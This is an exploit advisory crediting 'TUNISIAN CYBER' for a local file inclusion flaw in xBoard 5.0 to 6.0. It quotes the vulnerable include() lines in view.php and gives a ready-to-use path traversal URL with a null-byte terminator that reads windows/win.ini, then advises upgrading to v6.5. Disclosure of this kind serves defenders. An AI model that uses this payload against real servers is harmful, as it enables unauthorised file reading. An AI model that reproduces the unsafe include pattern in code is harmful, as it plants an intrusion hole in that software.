X-------------------------------------------------------------X
 _____ _   _ _   _ _____ _____ _____  ___   _   _   _______   _______ ___________ 
|_   _| | | | \ | |_   _/  ___|_   _|/ _ \ | \ | | /  __ \ \ / / ___ \  ___| ___ \
  | | | | | |  \| | | | \ `--.  | | / /_\ \|  \| | | /  \/\ V /| |_/ / |__ | |_/ /
  | | | | | | . ` | | |  `--. \ | | |  _  || . ` | | |     \ / | ___ \  __||    / 
  | | | |_| | |\  |_| |_/\__/ /_| |_| | | || |\  | | \__/\ | | | |_/ / |___| |\ \ 
  \_/  \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/  \____/ \_/ \____/\____/\_| \_|
X-------------------------------------------------------------X                                                                                  
 
 
[+] Author: TUNISIAN CYBER
[+] Exploit Title:  xBoard 5.0/5.5/6.0 Local File Inclusion
[+] Date: 24-12-2013
[+] Category: WebApp
[+] Vendor:http://sourceforge.net/projects/xboard/
[+] Google Dork: 
[+] Tested on: Win7 , ubuntu 13.04
 
 
########################################################################################
I/Vulnerable code: view.php
v5.0:
49: if (file_exists("$directory/$post.html"))
50: {
51: include("$directory/$post.html");

v5.5:
28: if (file_exists("$directory/$post.html"))
29: {
30: include("$directory/$post.html");

v6.0:
27: if (file_exists("$directory/$post.html"))
28: {
29: include("$directory/$post.html");

II/Exploit and p.0.c:
http://{host}/xboard/view.php?post=../../../../../../../../../../windows/win.ini%00
p.0.c: http://oi44.tinypic.com/2uxyaz9.jpg

III/Solution:
Upgrade to v6.5

./3nD
########################################################################################
Greets to: XMaXtn, N43il HacK3r, XtechSEt